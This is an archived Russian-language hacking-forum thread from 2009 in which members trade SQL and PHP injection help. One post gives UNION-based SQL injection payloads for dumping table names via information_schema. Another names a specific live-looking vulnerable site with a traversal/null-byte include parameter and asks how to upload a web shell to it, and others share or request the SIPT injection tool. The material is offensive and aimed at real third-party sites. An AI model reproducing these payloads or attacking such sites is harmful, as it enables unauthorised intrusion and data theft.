ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
12.06.2009, 12:17
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
привет всем, я понимаю что на мой вопрос полюбому есть ответ в этой теме, но что бы не листать 757 страниц задам его ещё раз. Как перевести таблицу в кеш? Раньше пользовался http://nahta4ok.far.ru/tools.php , но вчера он закрыл свой сайт. Может есть праги?
а поиск поюзать?
и что за кеш? попробуй http://x3k.ru/ если конечно я тебя правильно понял
|
|
|
12.06.2009, 15:27
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552
Репутация:
1668
|
|
Дикс, прочитай внимательно https://forum.antichat.ru/showpost.php?p=1047515&postcount=72
|
|
|
|
12.06.2009, 15:43
|
|
Новичок
Регистрация: 08.06.2009
Сообщений: 4
Провел на форуме:
7573
Репутация:
6
|
|
Сообщение от PaCo
Попробуй продолжить запрос, например:
SELECT cats.*,
IF(subcats.id IS NULL, 'N', 'Y') AS has_subcats,
subcats.name AS subcat_name,
parentcat.name AS parentcat_name
FROM cats
LEFT JOIN cats AS subcats ON subcats.parent_id = cats.id
LEFT JOIN cats AS parentcat ON parentcat.id = cats.parent_id
WHERE 1 AND cats.id = -98145 union select 1,(select 1 from table limit 1),3 from cats GROUP BY cats.id
ORDER BY cats.order_fld,cats.name
правда в 5-как с альясами при union выдаст тебе что cats.id - нема такой таблички(Unknown column 'id' in 'order clause'):
Also, if a column to be sorted is aliased, the ORDER BY clause must refer to the alias, not the column name.
вы неверно уловили суть проблемы, во
1-ых. по за-альяс'иным колонкам сортирует только груп, который находится в строке с inj.(%23)
2. у group другая ошибка
3. group в отличии от ордер бай в таких запросах сортирует ближайшую выборку
4. +не уверен, но group (в отличии от order) выполняется до формирования столбцов из select, а значит не должен ссылатся на альясы
5. даже если бы проблема была в group, альяс или колонку можно было бы вписать во вторую выборку
немного практики- узнаем имя бд(блинд или +union select 1 from lala%23)
и составляем запрос в такoм дуxe:
SELECT cats.*,
IF(subcats.id IS NULL, 'N', 'Y') AS has_subcats,
subcats.name AS subcat_name,
parentcat.name AS parentcat_name
FROM cats
LEFT JOIN cats AS subcats ON subcats.parent_id = cats.id
LEFT JOIN cats AS parentcat ON parentcat.id = cats.parent_id
WHERE 1 AND cats.id = 145 union select cats.*,table_name,1,2 from имя_базы.cats,information_schema.tables
GROUP BY cats.id
ORDER BY cats.order_fld,cats.name
конкретно здесь работать не будет, потаму что поля в ордербае задаются в виде имя_табл.колонка (что не катит в двойных запросах)
но если в вашей многострочной скуле order by поле то этот способ вам поможет)
|
|
|
|
12.06.2009, 18:28
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
Здравствуйте, подскажите пожалуйсто как можно залить шел через PHP иньекцию
Вот уязвимый сайт
http://www.cyl.ru/index.php?page=3&lang=../%00
Взял я его из раздела PHP иньекции.
Там уже залит шел, мне просто интеренсно, каким способом....  |
|
|
|
12.06.2009, 21:49
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
1 Это не инклуд там file()
2 Тема что по инклуд, что про читалку достаточно обширная и отражена в статьях.
Т.е. нет такой кнопки "Залить шелл через инклуд" (Ну если только RFI ), а переписывать сюда статьи для тебя не имеет смысла .
PS Что такое RFI тоже в статьях вот линки, читай:
https://forum.antichat.ru/thread12123.html
http://forum.antichat.ru/thread23501.html
https://forum.antichat.ru/thread91807.html
https://forum.antichat.ru/thread98525.html |
|
|
|
13.06.2009, 00:02
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
[ Вопрос ] Автоматизация подбора полей и таблиц в MySQL и MsSql (надеюсь что тут этот вопрос можно задать)
Нужны данные проги, работающие по сабжу + независимо друг от друга...если кто то знает сие, то может и заделится))
консольные проги, работающие сами по себе приветствуются)
|
|
|
|
13.06.2009, 00:07
|
|
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802
Репутация:
298
|
|
jecka3000
можете использовать SIPT
http://forum.antichat.ru/thread24918-sipt.html
|
|
|
|
13.06.2009, 00:18
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
А кто-нибудь может залить СИПТ 4.0 куда нить,т.к. все ссылки в темах битые....
К тому же качал несколько архивов с ним с 4 сайтов, ни один работает...
|
|
|
|
13.06.2009, 00:20
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
http://forum.antichat.ru/thread124949.html
|
|
|
|
13.06.2009, 00:35
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919
Репутация:
229
|
|
А кто-нибудь может залить СИПТ 4.0 куда нить,т.к. все ссылки в темах битые....
Держи SIPT4
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
